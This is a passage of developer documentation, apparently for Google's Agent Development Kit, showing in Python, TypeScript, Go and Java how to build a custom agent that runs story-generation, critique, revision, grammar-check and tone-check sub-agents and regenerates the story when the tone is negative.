    def __init__(
        self,
        name: str,
        story_generator: LlmAgent,
        critic: LlmAgent,
        reviser: LlmAgent,
        grammar_check: LlmAgent,
        tone_check: LlmAgent,
    ):
        """
        Initializes the StoryFlowAgent.

        Args:
            name: The name of the agent.
            story_generator: An LlmAgent to generate the initial story.
            critic: An LlmAgent to critique the story.
            reviser: An LlmAgent to revise the story based on criticism.
            grammar_check: An LlmAgent to check the grammar.
            tone_check: An LlmAgent to analyze the tone.
        """
        # Create internal agents *before* calling super().__init__
        loop_agent = LoopAgent(
            name="CriticReviserLoop", sub_agents=[critic, reviser], max_iterations=2
        )
        sequential_agent = SequentialAgent(
            name="PostProcessing", sub_agents=[grammar_check, tone_check]
        )

        # Define the sub_agents list for the framework
        sub_agents_list = [
            story_generator,
            loop_agent,
            sequential_agent,
        ]

        # Pydantic will validate and assign them based on the class annotations.
        super().__init__(
            name=name,
            story_generator=story_generator,
            critic=critic,
            reviser=reviser,
            grammar_check=grammar_check,
            tone_check=tone_check,
            loop_agent=loop_agent,
            sequential_agent=sequential_agent,
            sub_agents=sub_agents_list,  # Pass the sub_agents list directly
        )
```

In TypeScript, we define the `StoryFlowAgent` by extending `BaseAgent`. In its constructor, we:

1. Create any internal composite agents (like `LoopAgent` or `SequentialAgent`).
1. Pass the list of all top-level sub-agents to the `super()` constructor.
1. Store the sub-agents (passed in or created internally) as instance properties (e.g., `this.storyGenerator`) so they can be accessed in the custom `runAsyncImpl` logic.

```typescript
class StoryFlowAgent extends BaseAgent {
  // --- Property Declarations for TypeScript ---
  private storyGenerator: LlmAgent;
  private critic: LlmAgent;
  private reviser: LlmAgent;
  private grammarCheck: LlmAgent;
  private toneCheck: LlmAgent;

  private loopAgent: LoopAgent;
  private sequentialAgent: SequentialAgent;

  constructor(
    name: string,
    storyGenerator: LlmAgent,
    critic: LlmAgent,
    reviser: LlmAgent,
    grammarCheck: LlmAgent,
    toneCheck: LlmAgent
  ) {
    // Create internal composite agents
    const loopAgent = new LoopAgent({
      name: "CriticReviserLoop",
      subAgents: [critic, reviser],
      maxIterations: 2,
    });

    const sequentialAgent = new SequentialAgent({
      name: "PostProcessing",
      subAgents: [grammarCheck, toneCheck],
    });

    // Define the sub-agents for the framework to know about
    const subAgentsList = [
      storyGenerator,
      loopAgent,
      sequentialAgent,
    ];

    // Call the parent constructor
    super({
      name,
      subAgents: subAgentsList,
    });

    // Assign agents to class properties for use in the custom run logic
    this.storyGenerator = storyGenerator;
    this.critic = critic;
    this.reviser = reviser;
    this.grammarCheck = grammarCheck;
    this.toneCheck = toneCheck;
    this.loopAgent = loopAgent;
    this.sequentialAgent = sequentialAgent;
  }
```

In Go, we define the `StoryFlowAgent` struct and a constructor. In the constructor, we store the necessary sub-agents and tell the ADK framework about the top-level agents this custom agent will directly orchestrate.

```go
// StoryFlowAgent is a custom agent that orchestrates a story generation workflow.
// It encapsulates the logic of running sub-agents in a specific sequence.
type StoryFlowAgent struct {
    storyGenerator     agent.Agent
    revisionLoopAgent  agent.Agent
    postProcessorAgent agent.Agent
}

// NewStoryFlowAgent creates and configures the entire custom agent workflow.
// It takes individual LLM agents as input and internally creates the necessary
// workflow agents (loop, sequential), returning the final orchestrator agent.
func NewStoryFlowAgent(
    storyGenerator,
    critic,
    reviser,
    grammarCheck,
    toneCheck agent.Agent,
) (agent.Agent, error) {
    loopAgent, err := loopagent.New(loopagent.Config{
        MaxIterations: 2,
        AgentConfig: agent.Config{
            Name:      "CriticReviserLoop",
            SubAgents: []agent.Agent{critic, reviser},
        },
    })
    if err != nil {
        return nil, fmt.Errorf("failed to create loop agent: %w", err)
    }

    sequentialAgent, err := sequentialagent.New(sequentialagent.Config{
        AgentConfig: agent.Config{
            Name:      "PostProcessing",
            SubAgents: []agent.Agent{grammarCheck, toneCheck},
        },
    })
    if err != nil {
        return nil, fmt.Errorf("failed to create sequential agent: %w", err)
    }

    // The StoryFlowAgent struct holds the agents needed for the Run method.
    orchestrator := &StoryFlowAgent{
        storyGenerator:     storyGenerator,
        revisionLoopAgent:  loopAgent,
        postProcessorAgent: sequentialAgent,
    }

    // agent.New creates the final agent, wiring up the Run method.
    return agent.New(agent.Config{
        Name:        "StoryFlowAgent",
        Description: "Orchestrates story generation, critique, revision, and checks.",
        SubAgents:   []agent.Agent{storyGenerator, loopAgent, sequentialAgent},
        Run:         orchestrator.Run,
    })
}
```

In Java, we define the `StoryFlowAgentExample` by extending `BaseAgent`. In its **constructor**, we store the necessary sub-agent instances (passed as parameters) as instance fields. These top-level sub-agents, which this custom agent will directly orchestrate, are also passed to the `super` constructor of `BaseAgent` as a list.
```java
private final LlmAgent storyGenerator;
private final LoopAgent loopAgent;
private final SequentialAgent sequentialAgent;

public StoryFlowAgentExample(
    String name, LlmAgent storyGenerator, LoopAgent loopAgent, SequentialAgent sequentialAgent) {
  super(
      name,
      "Orchestrates story generation, critique, revision, and checks.",
      List.of(storyGenerator, loopAgent, sequentialAgent),
      null,
      null);

  this.storyGenerator = storyGenerator;
  this.loopAgent = loopAgent;
  this.sequentialAgent = sequentialAgent;
}
```

______________________________________________________________________

### Part 2: Defining the Custom Execution Logic

In Python, the `_run_async_impl` method orchestrates the sub-agents using standard Python async/await and control flow.

```python
    @override
    async def _run_async_impl(
        self, ctx: InvocationContext
    ) -> AsyncGenerator[Event, None]:
        """
        Implements the custom orchestration logic for the story workflow.
        Uses the instance attributes assigned by Pydantic (e.g., self.story_generator).
        """
        logger.info(f"[{self.name}] Starting story generation workflow.")

        # 1. Initial Story Generation
        logger.info(f"[{self.name}] Running StoryGenerator...")
        async for event in self.story_generator.run_async(ctx):
            logger.info(f"[{self.name}] Event from StoryGenerator: {event.model_dump_json(indent=2, exclude_none=True)}")
            yield event

        # Check if story was generated before proceeding
        if "current_story" not in ctx.session.state or not ctx.session.state["current_story"]:
            logger.error(f"[{self.name}] Failed to generate initial story. Aborting workflow.")
            return  # Stop processing if initial story failed

        logger.info(f"[{self.name}] Story state after generator: {ctx.session.state.get('current_story')}")

        # 2. Critic-Reviser Loop
        logger.info(f"[{self.name}] Running CriticReviserLoop...")
        # Use the loop_agent instance attribute assigned during init
        async for event in self.loop_agent.run_async(ctx):
            logger.info(f"[{self.name}] Event from CriticReviserLoop: {event.model_dump_json(indent=2, exclude_none=True)}")
            yield event

        logger.info(f"[{self.name}] Story state after loop: {ctx.session.state.get('current_story')}")

        # 3. Sequential Post-Processing (Grammar and Tone Check)
        logger.info(f"[{self.name}] Running PostProcessing...")
        # Use the sequential_agent instance attribute assigned during init
        async for event in self.sequential_agent.run_async(ctx):
            logger.info(f"[{self.name}] Event from PostProcessing: {event.model_dump_json(indent=2, exclude_none=True)}")
            yield event

        # 4. Tone-Based Conditional Logic
        tone_check_result = ctx.session.state.get("tone_check_result")
        logger.info(f"[{self.name}] Tone check result: {tone_check_result}")

        if tone_check_result == "negative":
            logger.info(f"[{self.name}] Tone is negative. Regenerating story...")
            async for event in self.story_generator.run_async(ctx):
                logger.info(f"[{self.name}] Event from StoryGenerator (Regen): {event.model_dump_json(indent=2, exclude_none=True)}")
                yield event
        else:
            logger.info(f"[{self.name}] Tone is not negative. Keeping current story.")
            pass

        logger.info(f"[{self.name}] Workflow finished.")
```

**Explanation of Logic:**

1. The initial `story_generator` runs. Its output is expected to be in `ctx.session.state["current_story"]`.
1. The `loop_agent` runs, which internally calls the `critic` and `reviser` sequentially, up to `max_iterations` times. They read/write `current_story` and `criticism` from/to the state.
1. The `sequential_agent` runs, calling `grammar_check` then `tone_check`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state.
1. **Custom Part:** The `if` statement checks the `tone_check_result` from the state.
   If it's "negative", the `story_generator` is called *again*, overwriting the `current_story` in the state. Otherwise, the flow ends.

In TypeScript, the `runAsyncImpl` method orchestrates the sub-agents using standard TypeScript `async`/`await` and control flow. The `runLiveImpl` method is also added to handle live streaming scenarios.

```typescript
  // Delegates live streaming runs to the same orchestration logic.
  async* runLiveImpl(ctx: InvocationContext): AsyncGenerator {
    yield* this.runAsyncImpl(ctx);
  }

  // Implements the custom orchestration logic for the story workflow.
  async* runAsyncImpl(ctx: InvocationContext): AsyncGenerator {
    console.log(`[${this.name}] Starting story generation workflow.`);

    // 1. Initial Story Generation
    console.log(`[${this.name}] Running StoryGenerator...`);
    for await (const event of this.storyGenerator.runAsync(ctx)) {
      console.log(`[${this.name}] Event from StoryGenerator: ${JSON.stringify(event, null, 2)}`);
      yield event;
    }

    // Check if the story was generated before proceeding
    if (!ctx.session.state["current_story"]) {
      console.error(`[${this.name}] Failed to generate initial story. Aborting workflow.`);
      return; // Stop processing
    }
    console.log(`[${this.name}] Story state after generator: ${ctx.session.state['current_story']}`);

    // 2. Critic-Reviser Loop
    console.log(`[${this.name}] Running CriticReviserLoop...`);
    for await (const event of this.loopAgent.runAsync(ctx)) {
      console.log(`[${this.name}] Event from CriticReviserLoop: ${JSON.stringify(event, null, 2)}`);
      yield event;
    }
    console.log(`[${this.name}] Story state after loop: ${ctx.session.state['current_story']}`);

    // 3. Sequential Post-Processing (Grammar and Tone Check)
    console.log(`[${this.name}] Running PostProcessing...`);
    for await (const event of this.sequentialAgent.runAsync(ctx)) {
      console.log(`[${this.name}] Event from PostProcessing: ${JSON.stringify(event, null, 2)}`);
      yield event;
    }

    // 4. Tone-Based Conditional Logic
    const toneCheckResult = ctx.session.state["tone_check_result"] as string;
    console.log(`[${this.name}] Tone check result: ${toneCheckResult}`);

    if (toneCheckResult === "negative") {
      console.log(`[${this.name}] Tone is negative. Regenerating story...`);
      for await (const event of this.storyGenerator.runAsync(ctx)) {
        console.log(`[${this.name}] Event from StoryGenerator (Regen): ${JSON.stringify(event, null, 2)}`);
        yield event;
      }
    } else {
      console.log(`[${this.name}] Tone is not negative. Keeping current story.`);
    }

    console.log(`[${this.name}] Workflow finished.`);
  }
```

**Explanation of Logic:**

1. The initial `storyGenerator` runs. Its output is expected to be in `ctx.session.state['current_story']`.
1. The `loopAgent` runs, which internally calls the `critic` and `reviser` sequentially, up to `maxIterations` times. They read/write `current_story` and `criticism` from/to the state.
1. The `sequentialAgent` runs, calling `grammarCheck` then `toneCheck`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state.
1. **Custom Part:** The `if` statement checks the `tone_check_result` from the state. If it's "negative", the `storyGenerator` is called *again*, overwriting the `current_story` in the state. Otherwise, the flow ends.

In Go, the `Run` method orchestrates the sub-agents by calling their respective `Run` methods in a loop and yielding their events.

```go
// Run defines the custom execution logic for the StoryFlowAgent.
func (s *StoryFlowAgent) Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { // Stage 1: Initial Story Generation for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story generator failed: %w", err)) return } if !yield(event, nil) { return } } // Check if story was generated before proceeding currentStory, err := ctx.Session().State().Get("current_story") if err != nil || currentStory == "" { log.Println("Failed to generate initial story. Aborting workflow.") return } // Stage 2: Critic-Reviser Loop for event, err := range s.revisionLoopAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("loop agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 3: Post-Processing for event, err := range s.postProcessorAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("sequential agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 4: Conditional Regeneration toneResult, err := ctx.Session().State().Get("tone_check_result") if err != nil { log.Printf("Could not read tone_check_result from state: %v. Assuming tone is not negative.", err) return } if tone, ok := toneResult.(string); ok && tone == "negative" { log.Println("Tone is negative. Regenerating story...") for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story regeneration failed: %w", err)) return } if !yield(event, nil) { return } } } else { log.Println("Tone is not negative. Keeping current story.") } } } ``` **Explanation of Logic:** 1. The initial `storyGenerator` runs. Its output is expected to be in the session state under the key `"current_story"`. 1. The `revisionLoopAgent` runs, which internally calls the `critic` and `reviser` sequentially for `max_iterations` times. They read/write `current_story` and `criticism` from/to the state. 1. 
The `postProcessorAgent` runs, calling `grammarCheck` then `toneCheck`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state.
1. **Custom Part:** The code checks the `tone_check_result` from the state. If it's "negative", the `storyGenerator` is called *again*, overwriting the `current_story` in the state. Otherwise, the flow ends.

The `runAsyncImpl` method orchestrates the sub-agents using RxJava's Flowable streams and operators for asynchronous control flow.

```java
@Override
protected Flowable<Event> runAsyncImpl(InvocationContext invocationContext) {
  // Implements the custom orchestration logic for the story workflow.
  // Uses the sub-agent fields of this class (e.g., storyGenerator).
  logger.log(Level.INFO, () -> String.format("[%s] Starting story generation workflow.", name()));

  // Stage 1: Initial Story Generation
  Flowable<Event> storyGenFlow = runStage(storyGenerator, invocationContext, "StoryGenerator");

  // Stage 2: Critic-Reviser Loop (runs after story generation completes)
  Flowable<Event> criticReviserFlow = Flowable.defer(() -> {
    if (!isStoryGenerated(invocationContext)) {
      logger.log(Level.SEVERE,() -> String.format("[%s] Failed to generate initial story. 
Aborting after StoryGenerator.", name()));
      return Flowable.empty(); // Stop further processing if no story
    }
    logger.log(Level.INFO, () -> String.format("[%s] Story state after generator: %s", name(), invocationContext.session().state().get("current_story")));
    return runStage(loopAgent, invocationContext, "CriticReviserLoop");
  });

  // Stage 3: Post-Processing (runs after critic-reviser loop completes)
  Flowable<Event> postProcessingFlow = Flowable.defer(() -> {
    logger.log(Level.INFO, () -> String.format("[%s] Story state after loop: %s", name(), invocationContext.session().state().get("current_story")));
    return runStage(sequentialAgent, invocationContext, "PostProcessing");
  });

  // Stage 4: Conditional Regeneration (runs after post-processing completes)
  Flowable<Event> conditionalRegenFlow = Flowable.defer(() -> {
    String toneCheckResult = (String) invocationContext.session().state().get("tone_check_result");
    logger.log(Level.INFO, () -> String.format("[%s] Tone check result: %s", name(), toneCheckResult));

    if ("negative".equalsIgnoreCase(toneCheckResult)) {
      logger.log(Level.INFO, () -> String.format("[%s] Tone is negative. Regenerating story...", name()));
      return runStage(storyGenerator, invocationContext, "StoryGenerator (Regen)");
    } else {
      logger.log(Level.INFO, () -> String.format("[%s] Tone is not negative. 
Keeping current story.", name()));
      return Flowable.empty(); // No regeneration needed
    }
  });

  return Flowable.concatArray(storyGenFlow, criticReviserFlow, postProcessingFlow, conditionalRegenFlow)
      .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] Workflow finished.", name())));
}

// Helper method for a single agent run stage with logging
private Flowable<Event> runStage(BaseAgent agentToRun, InvocationContext ctx, String stageName) {
  logger.log(Level.INFO, () -> String.format("[%s] Running %s...", name(), stageName));
  return agentToRun
      .runAsync(ctx)
      .doOnNext(event -> logger.log(Level.INFO,() -> String.format("[%s] Event from %s: %s", name(), stageName, event.toJson())))
      .doOnError(err -> logger.log(Level.SEVERE, String.format("[%s] Error in %s", name(), stageName), err))
      .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] %s finished.", name(), stageName)));
}
```

**Explanation of Logic:**

1. The initial `storyGenerator.runAsync(invocationContext)` Flowable is executed. Its output is expected to be in `invocationContext.session().state().get("current_story")`.
1. The `loopAgent`'s Flowable runs next (due to `Flowable.concatArray` and `Flowable.defer`). The `LoopAgent` internally calls the `critic` and `reviser` sub-agents sequentially for up to `maxIterations` iterations. They read/write `current_story` and `criticism` from/to the state.
1. Then, the `sequentialAgent`'s Flowable executes. It calls `grammarCheck` then `toneCheck`, reading `current_story` and writing `grammar_suggestions` and `tone_check_result` to the state.
1. **Custom Part:** After the `sequentialAgent` completes, logic within a `Flowable.defer` checks the "tone_check_result" from `invocationContext.session().state()`. If it's "negative", the `storyGenerator` Flowable is *conditionally concatenated* and executed again, overwriting "current_story". Otherwise, an empty Flowable is used, and the overall workflow proceeds to completion.
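
The four-stage control flow described in the explanations above can be sketched without any ADK dependency. The following is a minimal Python sketch, assuming plain async generators as stand-ins for the sub-agents and a plain `dict` as a stand-in for the session state. The function names (`generate_story`, `revise_loop`, `post_process`, `story_flow`) and the `forced_tone` key are hypothetical and exist only for illustration; they are not part of ADK.

```python
import asyncio
from typing import AsyncIterator, Dict, List

State = Dict[str, str]


async def generate_story(state: State) -> AsyncIterator[str]:
    """Stand-in for the story generator: writes `current_story` to state."""
    state["current_story"] = f"A story about {state['topic']}."
    yield "story_generated"


async def revise_loop(state: State, max_iterations: int = 2) -> AsyncIterator[str]:
    """Stand-in for the critic/reviser loop: alternates the two steps."""
    for i in range(max_iterations):
        state["criticism"] = f"criticism #{i + 1}"
        yield "critic_ran"
        state["current_story"] += " (revised)"
        yield "reviser_ran"


async def post_process(state: State) -> AsyncIterator[str]:
    """Stand-in for grammar and tone checks, run one after the other."""
    state["grammar_suggestions"] = "Grammar is good!"
    yield "grammar_checked"
    # `forced_tone` is a hypothetical test hook that replaces a real LLM verdict.
    state["tone_check_result"] = state.get("forced_tone", "neutral")
    yield "tone_checked"


async def story_flow(state: State) -> AsyncIterator[str]:
    """Custom orchestration: three fixed stages, then a conditional rerun."""
    async for event in generate_story(state):
        yield event
    if not state.get("current_story"):
        return  # Abort if the first stage produced nothing
    async for event in revise_loop(state):
        yield event
    async for event in post_process(state):
        yield event
    # The custom part: regenerate only when the tone check says "negative".
    if state.get("tone_check_result") == "negative":
        async for event in generate_story(state):
            yield event


async def collect(state: State) -> List[str]:
    """Drain the orchestrator and return the events in the order yielded."""
    return [event async for event in story_flow(state)]


if __name__ == "__main__":
    print(asyncio.run(collect({"topic": "a cat", "forced_tone": "negative"})))
```

The orchestrator only forwards events and inspects shared state between stages, which is the same division of labor the real implementations use: sub-agents communicate through state keys, and the custom agent decides what runs next.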
______________________________________________________________________

### Part 3: Defining the LLM Sub-Agents

These are standard `LlmAgent` definitions, each responsible for a specific task. Their `output_key` parameter is crucial: it places each agent's result into `session.state`, where other agents or the custom orchestrator can read it.

**Direct State Injection in Instructions:** Notice the `story_generator`'s instruction. The `{var}` syntax is a placeholder. Before the instruction is sent to the LLM, the ADK framework automatically replaces each placeholder (for example, `{topic}`) with the corresponding state value (`session.state['topic']`). Templating in the instruction is the recommended way to provide context to an agent. For more details, see the [State documentation](https://google.github.io/adk-docs/sessions/state/#accessing-session-state-in-agent-instructions).

```python
GEMINI_2_FLASH = "gemini-2.0-flash" # Define model constant

# --- Define the individual LLM agents ---
story_generator = LlmAgent(
    name="StoryGenerator",
    model=GEMINI_2_FLASH,
    instruction="""You are a story writer. Write a short story (around 100 words), on the following topic: {topic}""",
    input_schema=None,
    output_key="current_story",  # Key for storing output in session state
)

critic = LlmAgent(
    name="Critic",
    model=GEMINI_2_FLASH,
    instruction="""You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.""",
    input_schema=None,
    output_key="criticism",  # Key for storing criticism in session state
)

reviser = LlmAgent(
    name="Reviser",
    model=GEMINI_2_FLASH,
    instruction="""You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.""",
    input_schema=None,
    output_key="current_story",  # Overwrites the original story
)

grammar_check = LlmAgent(
    name="GrammarCheck",
    model=GEMINI_2_FLASH,
    instruction="""You are a grammar checker. 
Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.""", input_schema=None, output_key="grammar_suggestions", ) tone_check = LlmAgent( name="ToneCheck", model=GEMINI_2_FLASH, instruction="""You are a tone analyzer. Analyze the tone of the story provided: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.""", input_schema=None, output_key="tone_check_result", # This agent's output determines the conditional flow ) ``` ```typescript // --- Define the individual LLM agents --- const storyGenerator = new LlmAgent({ name: "StoryGenerator", model: GEMINI_MODEL, instruction: `You are a story writer. Write a short story (around 100 words), on the following topic: {topic}`, outputKey: "current_story", }); const critic = new LlmAgent({ name: "Critic", model: GEMINI_MODEL, instruction: `You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.`, outputKey: "criticism", }); const reviser = new LlmAgent({ name: "Reviser", model: GEMINI_MODEL, instruction: `You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.`, outputKey: "current_story", // Overwrites the original story }); const grammarCheck = new LlmAgent({ name: "GrammarCheck", model: GEMINI_MODEL, instruction: `You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.`, outputKey: "grammar_suggestions", }); const toneCheck = new LlmAgent({ name: "ToneCheck", model: GEMINI_MODEL, instruction: `You are a tone analyzer. Analyze the tone of the story provided: {current_story}. 
Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.`, outputKey: "tone_check_result", }); ``` ```go // --- Define the individual LLM agents --- storyGenerator, err := llmagent.New(llmagent.Config{ Name: "StoryGenerator", Model: model, Description: "Generates the initial story.", Instruction: "You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic}", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create StoryGenerator agent: %v", err) } critic, err := llmagent.New(llmagent.Config{ Name: "Critic", Model: model, Description: "Critiques the story.", Instruction: "You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.", OutputKey: "criticism", }) if err != nil { log.Fatalf("Failed to create Critic agent: %v", err) } reviser, err := llmagent.New(llmagent.Config{ Name: "Reviser", Model: model, Description: "Revises the story based on criticism.", Instruction: "You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story.", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create Reviser agent: %v", err) } grammarCheck, err := llmagent.New(llmagent.Config{ Name: "GrammarCheck", Model: model, Description: "Checks grammar and suggests corrections.", Instruction: "You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.", OutputKey: "grammar_suggestions", }) if err != nil { log.Fatalf("Failed to create GrammarCheck agent: %v", err) } toneCheck, err := llmagent.New(llmagent.Config{ Name: "ToneCheck", Model: model, Description: "Analyzes the tone of the story.", Instruction: "You are a tone analyzer. 
Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.", OutputKey: "tone_check_result", }) if err != nil { log.Fatalf("Failed to create ToneCheck agent: %v", err) } ``` ```java // --- Define the individual LLM agents --- LlmAgent storyGenerator = LlmAgent.builder() .name("StoryGenerator") .model(MODEL_NAME) .description("Generates the initial story.") .instruction( """ You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic} """) .inputSchema(null) .outputKey("current_story") // Key for storing output in session state .build(); LlmAgent critic = LlmAgent.builder() .name("Critic") .model(MODEL_NAME) .description("Critiques the story.") .instruction( """ You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character. """) .inputSchema(null) .outputKey("criticism") // Key for storing criticism in session state .build(); LlmAgent reviser = LlmAgent.builder() .name("Reviser") .model(MODEL_NAME) .description("Revises the story based on criticism.") .instruction( """ You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story. """) .inputSchema(null) .outputKey("current_story") // Overwrites the original story .build(); LlmAgent grammarCheck = LlmAgent.builder() .name("GrammarCheck") .model(MODEL_NAME) .description("Checks grammar and suggests corrections.") .instruction( """ You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors. 
""") .outputKey("grammar_suggestions") .build(); LlmAgent toneCheck = LlmAgent.builder() .name("ToneCheck") .model(MODEL_NAME) .description("Analyzes the tone of the story.") .instruction( """ You are a tone analyzer. Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise. """) .outputKey("tone_check_result") // This agent's output determines the conditional flow .build(); LoopAgent loopAgent = LoopAgent.builder() .name("CriticReviserLoop") .description("Iteratively critiques and revises the story.") .subAgents(critic, reviser) .maxIterations(2) .build(); SequentialAgent sequentialAgent = SequentialAgent.builder() .name("PostProcessing") .description("Performs grammar and tone checks sequentially.") .subAgents(grammarCheck, toneCheck) .build(); ``` ______________________________________________________________________ ### Part 4: Instantiating and Running the custom agent Finally, you instantiate your `StoryFlowAgent` and use the `Runner` as usual. 
```python # --- Create the custom agent instance --- story_flow_agent = StoryFlowAgent( name="StoryFlowAgent", story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, ) INITIAL_STATE = {"topic": "a brave kitten exploring a haunted house"} # --- Setup Runner and Session --- async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID, state=INITIAL_STATE) logger.info(f"Initial session state: {session.state}") runner = Runner( agent=story_flow_agent, # Pass the custom orchestrator agent app_name=APP_NAME, session_service=session_service ) return session_service, runner # --- Function to Interact with the Agent --- async def call_agent_async(user_input_topic: str): """ Sends a new topic to the agent (overwriting the initial one if needed) and runs the workflow. """ session_service, runner = await setup_session_and_runner() current_session = session_service.sessions[APP_NAME][USER_ID][SESSION_ID] current_session.state["topic"] = user_input_topic logger.info(f"Updated session state topic to: {user_input_topic}") content = types.Content(role='user', parts=[types.Part(text=f"Generate a story about the preset topic.")]) events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) final_response = "No final response captured." 
async for event in events: if event.is_final_response() and event.content and event.content.parts: logger.info(f"Potential final response from [{event.author}]: {event.content.parts[0].text}") final_response = event.content.parts[0].text print("\n--- Agent Interaction Result ---") print("Agent Final Response: ", final_response) final_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) print("Final Session State:") import json print(json.dumps(final_session.state, indent=2)) print("-------------------------------\n") # --- Run the Agent --- # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("a lonely robot finding a friend in a junkyard") ``` ```typescript // --- Create the custom agent instance --- const storyFlowAgent = new StoryFlowAgent( "StoryFlowAgent", storyGenerator, critic, reviser, grammarCheck, toneCheck ); const INITIAL_STATE = { "topic": "a brave kitten exploring a haunted house" }; // --- Setup Runner and Session --- async function setupRunnerAndSession() { const runner = new InMemoryRunner({ agent: storyFlowAgent, appName: APP_NAME, }); const session = await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, state: INITIAL_STATE, }); console.log(`Initial session state: ${JSON.stringify(session.state, null, 2)}`); return runner; } // --- Function to Interact with the Agent --- async function callAgent(runner: InMemoryRunner, userInputTopic: string) { const currentSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); if (!currentSession) { return; } // Update the state with the new topic for this run currentSession.state["topic"] = userInputTopic; console.log(`Updated session state topic to: ${userInputTopic}`); let finalResponse = "No final response 
captured."; for await (const event of runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID, newMessage: createUserContent(`Generate a story about: ${userInputTopic}`) })) { if (isFinalResponse(event) && event.content?.parts?.length) { console.log(`Potential final response from [${event.author}]: ${event.content.parts.map(part => part.text ?? '').join('')}`); finalResponse = event.content.parts.map(part => part.text ?? '').join(''); } } const finalSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); console.log("\n--- Agent Interaction Result ---"); console.log("Agent Final Response: ", finalResponse); console.log("Final Session State:"); console.log(JSON.stringify(finalSession?.state, null, 2)); console.log("-------------------------------\n"); } // --- Run the Agent --- async function main() { const runner = await setupRunnerAndSession(); await callAgent(runner, "a lonely robot finding a friend in a junkyard"); } main(); ``` ```go // Instantiate the custom agent, which encapsulates the workflow agents. 
storyFlowAgent, err := NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck, ) if err != nil { log.Fatalf("Failed to create story flow agent: %v", err) } // --- Run the Agent --- sessionService := session.InMemoryService() initialState := map[string]any{ "topic": "a brave kitten exploring a haunted house", } sessionInstance, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, State: initialState, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } userTopic := "a lonely robot finding a friend in a junkyard" r, err := runner.New(runner.Config{ AppName: appName, Agent: storyFlowAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } input := genai.NewContentFromText("Generate a story about: "+userTopic, genai.RoleUser) events := r.Run(ctx, userID, sessionInstance.Session.ID(), input, agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, }) var finalResponse string for event, err := range events { if err != nil { log.Fatalf("An error occurred during agent execution: %v", err) } for _, part := range event.Content.Parts { // Accumulate text from all parts of the final response. finalResponse += part.Text } } fmt.Println("\n--- Agent Interaction Result ---") fmt.Println("Agent Final Response: " + finalResponse) finalSession, err := sessionService.Get(ctx, &session.GetRequest{ UserID: userID, AppName: appName, SessionID: sessionInstance.Session.ID(), }) if err != nil { log.Fatalf("Failed to retrieve final session: %v", err) } fmt.Println("Final Session State:", finalSession.Session.State()) } ``` ```java // --- Function to Interact with the Agent --- // Sends a new topic to the agent (overwriting the initial one if needed) // and runs the workflow. 
public static void runAgent(StoryFlowAgentExample agent, String userTopic) {
  // --- Setup Runner and Session ---
  InMemoryRunner runner = new InMemoryRunner(agent);

  Map<String, Object> initialState = new HashMap<>();
  initialState.put("topic", "a brave kitten exploring a haunted house");

  Session session =
      runner
          .sessionService()
          .createSession(APP_NAME, USER_ID, new ConcurrentHashMap<>(initialState), SESSION_ID)
          .blockingGet();
